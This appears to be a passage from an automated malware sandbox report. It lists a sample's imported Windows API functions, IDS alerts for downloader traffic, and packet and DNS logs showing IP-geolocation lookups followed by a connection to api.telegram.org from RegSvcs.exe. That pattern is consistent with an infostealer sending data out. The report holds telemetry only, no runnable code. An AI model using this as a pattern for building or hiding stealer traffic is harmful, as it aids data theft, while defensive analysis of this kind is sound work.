SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                              USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                              GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                              ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                              ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                              OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishGreat Britain
                                              EnglishUnited States

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-09-26T10:23:03.721929+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730193.122.130.080TCP
                                              2024-09-26T10:23:04.534428+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730193.122.130.080TCP
                                              2024-09-26T10:23:05.097635+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449732188.114.96.3443TCP
                                              2024-09-26T10:23:05.925139+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449733193.122.130.080TCP
                                              2024-09-26T10:23:07.034408+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449735193.122.130.080TCP
                                              2024-09-26T10:23:11.903614+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449744188.114.96.3443TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 26, 2024 10:23:03.105946064 CEST4973080192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:03.110877037 CEST8049730193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:03.110950947 CEST4973080192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:03.113735914 CEST4973080192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:03.118571997 CEST8049730193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:03.572737932 CEST8049730193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:03.576543093 CEST4973080192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:03.581707954 CEST8049730193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:03.676399946 CEST8049730193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:03.721929073 CEST4973080192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:03.728929996 CEST49731443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:03.729017019 CEST44349731188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:03.729087114 CEST49731443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:03.741394997 CEST49731443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:03.741421938 CEST44349731188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:04.212991953 CEST44349731188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:04.213223934 CEST49731443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:04.217531919 CEST49731443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:04.217546940 CEST44349731188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:04.217809916 CEST44349731188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:04.267899990 CEST49731443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:04.315399885 CEST44349731188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:04.381900072 CEST44349731188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:04.381979942 CEST44349731188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:04.382023096 CEST49731443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:04.387945890 CEST49731443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:04.391239882 CEST4973080192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:04.396032095 CEST8049730193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:04.490767002 CEST8049730193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:04.493091106 CEST49732443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:04.493159056 CEST44349732188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:04.493242979 CEST49732443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:04.493493080 CEST49732443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:04.493506908 CEST44349732188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:04.534427881 CEST4973080192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:04.964356899 CEST44349732188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:04.965924025 CEST49732443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:04.966015100 CEST44349732188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:05.097641945 CEST44349732188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:05.097718954 CEST44349732188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:05.097775936 CEST49732443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:05.098144054 CEST49732443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:05.109477997 CEST4973080192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:05.110899925 CEST4973380192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:05.114475965 CEST8049730193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:05.114547968 CEST4973080192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:05.115737915 CEST8049733193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:05.115813971 CEST4973380192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:05.115922928 CEST4973380192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:05.120704889 CEST8049733193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:05.873536110 CEST8049733193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:05.875046015 CEST49734443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:05.875147104 CEST44349734188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:05.875252008 CEST49734443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:05.876005888 CEST49734443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:05.876055956 CEST44349734188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:05.925138950 CEST4973380192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:06.357134104 CEST44349734188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:06.364001989 CEST49734443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:06.364073992 CEST44349734188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:06.506578922 CEST44349734188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:06.506787062 CEST44349734188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:06.506953001 CEST49734443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:06.507164001 CEST49734443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:06.510061026 CEST4973380192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:06.511097908 CEST4973580192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:06.515259027 CEST8049733193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:06.515340090 CEST4973380192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:06.515968084 CEST8049735193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:06.516041040 CEST4973580192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:06.516117096 CEST4973580192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:06.520890951 CEST8049735193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:06.980233908 CEST8049735193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:06.981564045 CEST49736443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:06.981642008 CEST44349736188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:06.981750011 CEST49736443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:06.981980085 CEST49736443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:06.982009888 CEST44349736188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:07.034408092 CEST4973580192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:07.458513021 CEST44349736188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:07.466557026 CEST49736443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:07.466590881 CEST44349736188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:07.601047039 CEST44349736188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:07.601283073 CEST44349736188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:07.601353884 CEST49736443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:07.601639032 CEST49736443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:07.605331898 CEST4973780192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:07.610968113 CEST8049737193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:07.611140966 CEST4973780192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:07.611140966 CEST4973780192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:07.616538048 CEST8049737193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:08.065983057 CEST8049737193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:08.067048073 CEST49738443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:08.067089081 CEST44349738188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:08.067152977 CEST49738443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:08.067368031 CEST49738443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:08.067382097 CEST44349738188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:08.112572908 CEST4973780192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:08.538755894 CEST44349738188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:08.540121078 CEST49738443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:08.540162086 CEST44349738188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:08.649039984 CEST44349738188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:08.649231911 CEST44349738188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:08.649291039 CEST49738443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:08.649686098 CEST49738443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:08.652704954 CEST4973780192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:08.653613091 CEST4973980192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:08.657948971 CEST8049737193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:08.658010960 CEST4973780192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:08.658550978 CEST8049739193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:08.658622980 CEST4973980192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:08.658706903 CEST4973980192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:08.663531065 CEST8049739193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:09.122798920 CEST8049739193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:09.123984098 CEST49740443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:09.124025106 CEST44349740188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:09.124089003 CEST49740443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:09.124334097 CEST49740443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:09.124342918 CEST44349740188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:09.175707102 CEST4973980192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:09.586256981 CEST44349740188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:09.587675095 CEST49740443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:09.587697983 CEST44349740188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:09.709960938 CEST44349740188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:09.710221052 CEST44349740188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:09.710278034 CEST49740443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:09.710649967 CEST49740443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:09.714157104 CEST4973980192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:09.715166092 CEST4974180192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:09.719404936 CEST8049739193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:09.719468117 CEST4973980192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:09.720076084 CEST8049741193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:09.720151901 CEST4974180192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:09.720248938 CEST4974180192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:09.725379944 CEST8049741193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:10.193664074 CEST8049741193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:10.197647095 CEST49742443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:10.197777033 CEST44349742188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:10.197853088 CEST49742443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:10.198103905 CEST49742443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:10.198143005 CEST44349742188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:10.237539053 CEST4974180192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:10.660552025 CEST44349742188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:10.662249088 CEST49742443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:10.662305117 CEST44349742188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:10.785976887 CEST44349742188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:10.786204100 CEST44349742188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:10.786277056 CEST49742443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:10.786551952 CEST49742443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:10.789695024 CEST4974180192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:10.790278912 CEST4974380192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:10.794863939 CEST8049741193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:10.794931889 CEST4974180192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:10.795166016 CEST8049743193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:10.795245886 CEST4974380192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:10.795315981 CEST4974380192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:10.800148010 CEST8049743193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:11.272542953 CEST8049743193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:11.273560047 CEST49744443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:11.273622036 CEST44349744188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:11.273714066 CEST49744443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:11.273947954 CEST49744443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:11.273960114 CEST44349744188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:11.315696001 CEST4974380192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:11.752840042 CEST44349744188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:11.754734039 CEST49744443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:11.754776955 CEST44349744188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:11.903712988 CEST44349744188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:11.904036999 CEST44349744188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:11.904109001 CEST49744443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:11.904371977 CEST49744443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:11.907141924 CEST4974380192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:11.907855988 CEST4974580192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:11.912456989 CEST8049743193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:11.912539005 CEST4974380192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:11.912802935 CEST8049745193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:11.912873030 CEST4974580192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:11.918117046 CEST4974580192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:11.923037052 CEST8049745193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:12.369131088 CEST8049745193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:12.370332003 CEST49746443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:12.370429993 CEST44349746188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:12.370532990 CEST49746443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:12.370764971 CEST49746443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:12.370799065 CEST44349746188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:12.425074100 CEST4974580192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:12.860846996 CEST44349746188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:12.862700939 CEST49746443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:12.862739086 CEST44349746188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:13.008698940 CEST44349746188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:13.008990049 CEST44349746188.114.96.3192.168.2.4
                                              Sep 26, 2024 10:23:13.009097099 CEST49746443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:13.009346962 CEST49746443192.168.2.4188.114.96.3
                                              Sep 26, 2024 10:23:13.023072004 CEST4974580192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:13.028352022 CEST8049745193.122.130.0192.168.2.4
                                              Sep 26, 2024 10:23:13.028460026 CEST4974580192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:13.031747103 CEST49747443192.168.2.4149.154.167.220
                                              Sep 26, 2024 10:23:13.031790018 CEST44349747149.154.167.220192.168.2.4
                                              Sep 26, 2024 10:23:13.031856060 CEST49747443192.168.2.4149.154.167.220
                                              Sep 26, 2024 10:23:13.032227039 CEST49747443192.168.2.4149.154.167.220
                                              Sep 26, 2024 10:23:13.032246113 CEST44349747149.154.167.220192.168.2.4
                                              Sep 26, 2024 10:23:13.654015064 CEST44349747149.154.167.220192.168.2.4
                                              Sep 26, 2024 10:23:13.654097080 CEST49747443192.168.2.4149.154.167.220
                                              Sep 26, 2024 10:23:13.656771898 CEST49747443192.168.2.4149.154.167.220
                                              Sep 26, 2024 10:23:13.656800032 CEST44349747149.154.167.220192.168.2.4
                                              Sep 26, 2024 10:23:13.657212019 CEST44349747149.154.167.220192.168.2.4
                                              Sep 26, 2024 10:23:13.658512115 CEST49747443192.168.2.4149.154.167.220
                                              Sep 26, 2024 10:23:13.699449062 CEST44349747149.154.167.220192.168.2.4
                                              Sep 26, 2024 10:23:13.896179914 CEST44349747149.154.167.220192.168.2.4
                                              Sep 26, 2024 10:23:13.896363020 CEST44349747149.154.167.220192.168.2.4
                                              Sep 26, 2024 10:23:13.896418095 CEST49747443192.168.2.4149.154.167.220
                                              Sep 26, 2024 10:23:13.901217937 CEST49747443192.168.2.4149.154.167.220
                                              Sep 26, 2024 10:23:19.157331944 CEST4973580192.168.2.4193.122.130.0

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 26, 2024 10:23:03.091200113 CEST5688753192.168.2.41.1.1.1
                                              Sep 26, 2024 10:23:03.098345995 CEST53568871.1.1.1192.168.2.4
                                              Sep 26, 2024 10:23:03.718482018 CEST5711953192.168.2.41.1.1.1
                                              Sep 26, 2024 10:23:03.728307962 CEST53571191.1.1.1192.168.2.4
                                              Sep 26, 2024 10:23:13.023674965 CEST5899853192.168.2.41.1.1.1
                                              Sep 26, 2024 10:23:13.030961990 CEST53589981.1.1.1192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Sep 26, 2024 10:23:03.091200113 CEST192.168.2.41.1.1.10xfcbeStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 10:23:03.718482018 CEST192.168.2.41.1.1.10x9da5Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 10:23:13.023674965 CEST192.168.2.41.1.1.10x5bb7Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Sep 26, 2024 10:23:03.098345995 CEST1.1.1.1192.168.2.40xfcbeNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 10:23:03.098345995 CEST1.1.1.1192.168.2.40xfcbeNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 10:23:03.098345995 CEST1.1.1.1192.168.2.40xfcbeNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 10:23:03.098345995 CEST1.1.1.1192.168.2.40xfcbeNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 10:23:03.098345995 CEST1.1.1.1192.168.2.40xfcbeNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 10:23:03.098345995 CEST1.1.1.1192.168.2.40xfcbeNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 10:23:03.728307962 CEST1.1.1.1192.168.2.40x9da5No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 10:23:03.728307962 CEST1.1.1.1192.168.2.40x9da5No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 10:23:13.030961990 CEST1.1.1.1192.168.2.40x5bb7No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • reallyfreegeoip.org
                                              • api.telegram.org
                                              • checkip.dyndns.org

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449730193.122.130.0803152C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
